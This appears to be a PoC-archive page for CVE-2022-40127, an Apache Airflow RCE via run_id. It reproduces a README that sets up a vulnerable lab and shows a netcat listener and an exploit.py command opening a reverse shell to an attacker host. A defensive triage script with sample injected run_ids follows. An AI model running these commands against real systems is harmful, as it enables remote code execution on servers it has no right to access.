Related vulnerability
Title:
Apache Airflow code injection vulnerability
(CVE-2022-40127)
Description: Apache Airflow is an open-source platform from the Apache Software Foundation (USA) for creating, managing and monitoring workflows; it is extensible and supports dynamic monitoring. Apache Airflow has a code injection vulnerability: its Example DAGs allow an attacker with UI access who can trigger DAGs to execute arbitrary commands via a manually supplied run_id parameter.
Description
CVE-2022-40127 PoC and exploit
Introduction
# Apache Airflow < 2.4.0 RCE (CVE-2022-40127)
**PoC for CVE-2022-40127, an Apache Airflow RCE vulnerability affecting versions prior to 2.4.0.**
The <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40127" target="_blank">official report description</a> says:
> A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.
The repo is created for a CVE analysis blog post available on <a href="https://www.vicarius.io/vsociety/" target="_blank">vsociety blog</a>.
https://github.com/jakabakos/CVE-2022-40127/assets/42498816/2094f2ec-f074-41e6-99f4-f9f77dd09df6
## Usage
You can clone the repo:
```bash
git clone https://github.com/jakabakos/CVE-2022-40127.git
```
## Install and run Airflow v2.3.4
### Via docker-compose
Download the docker-compose file from the official documentation site:
```bash
cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
```
Run Airflow:
```bash
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up
open localhost:8080
```
In this case both the username and password will be `airflow`.
### Manually
Based on the <a href="https://airflow.apache.org/docs/apache-airflow/2.3.4/installation/installing-from-pypi.html" target="_blank">official install instructions</a>:
```bash
# The constraints file must match the Python version used by pip (here 3.8)
pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.8.txt"
```
You can verify if the installation was successful with commands `which airflow` and/or `airflow info`.
Run Airflow:
```bash
airflow standalone
```
See the generated password and username in the logs.
## Using the exploit
First, install the required packages with pip:
```bash
pip3 install -r requirements.txt
```
See the possible options with:
```bash
python3 exploit.py --help
```
Check whether the target is vulnerable (check mode, without `-a`):
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080
```
Set up a local listener for the reverse shell in a different terminal session:
```bash
nc -lvnp 4242
```
Run the script in attack mode with this command:
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080 -a -host <attacker_ip> -port 4242
```
You should see the connection within a minute or so.
<img width="1549" alt="proof" src="https://github.com/jakabakos/CVE-2022-40127/assets/42498816/a80ff9ec-69a1-4b99-91ea-c244098ded80">
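As a defensive complement to the PoC above (an added example, not code from the repo or its author): a triage helper that checks the two conditions the advisory names, an Airflow release prior to 2.4.0 and example DAGs being loaded, and scans DagRun run_id values for shell metacharacters that a scheduler-generated id never contains. The sample airflow.cfg text and run_ids are constructed; the `[core] load_examples` key and its `AIRFLOW__CORE__LOAD_EXAMPLES` environment override are real Airflow settings.

```python
import configparser
import re

# Constructed sample inputs (not taken from any real deployment).
SAMPLE_CFG = """[core]
load_examples = True
"""
SAMPLE_RUN_IDS = [
    "scheduled__2022-10-01T00:00:00+00:00",
    "manual__2022-10-02T12:30:00+00:00",
    "manual__; echo injected",   # shell metacharacter in a hand-typed run_id
    "manual__$(whoami)",
]

# Characters that have no business in a run_id but matter to a shell.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")


def is_affected_version(version: str) -> bool:
    """CVE-2022-40127 affects Apache Airflow releases prior to 2.4.0."""
    parts = tuple(int(p) for p in re.match(r"(\d+)\.(\d+)\.(\d+)", version).groups())
    return parts < (2, 4, 0)


def example_dags_enabled(cfg_text: str, env: dict) -> bool:
    """The vulnerable DAGs are only registered when [core] load_examples is on.
    AIRFLOW__CORE__LOAD_EXAMPLES in the environment overrides airflow.cfg;
    Airflow's own default for the key is True."""
    value = env.get("AIRFLOW__CORE__LOAD_EXAMPLES")
    if value is None:
        cp = configparser.ConfigParser()
        cp.read_string(cfg_text)
        value = cp.get("core", "load_examples", fallback="True")
    return value.strip().lower() in ("true", "1", "yes")


def suspicious_run_ids(run_ids):
    """Return run_ids carrying shell metacharacters, i.e. values that were
    supplied by hand rather than generated as scheduled__<ts> / manual__<ts>."""
    return [r for r in run_ids if SHELL_META.search(r)]


def triage(version: str, cfg_text: str, env: dict, run_ids) -> dict:
    exposed = is_affected_version(version) and example_dags_enabled(cfg_text, env)
    return {
        "exposed": exposed,
        "suspicious_run_ids": suspicious_run_ids(run_ids),
        "fix": "upgrade to >= 2.4.0; set AIRFLOW__CORE__LOAD_EXAMPLES=false" if exposed else "none",
    }


if __name__ == "__main__":
    print(triage("2.3.4", SAMPLE_CFG, {}, SAMPLE_RUN_IDS))
```

In a real review the run_ids would come from the `dag_run` table of the metadata database rather than the embedded list.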
File snapshot
[4.0K] /data/pocs/d6ab31e156c6b3ae34db80606a6d58385b5a184d
├── [6.0K] exploit.py
├── [4.0K] proofs
│ ├── [234K] flowchart.png
│ ├── [6.0M] proof.mp4
│ └── [380K] proof.png
├── [2.6K] README.md
└── [ 27] requirements.txt
1 directory, 6 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.